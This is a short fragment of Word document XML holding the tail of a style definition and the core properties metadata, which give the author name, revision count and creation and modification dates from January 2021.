    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C23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9FBB0-4E63-4A3C-B415-1F14C92F2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Vendrame</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alessandro Vendrame</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-27T10:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-28T09:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>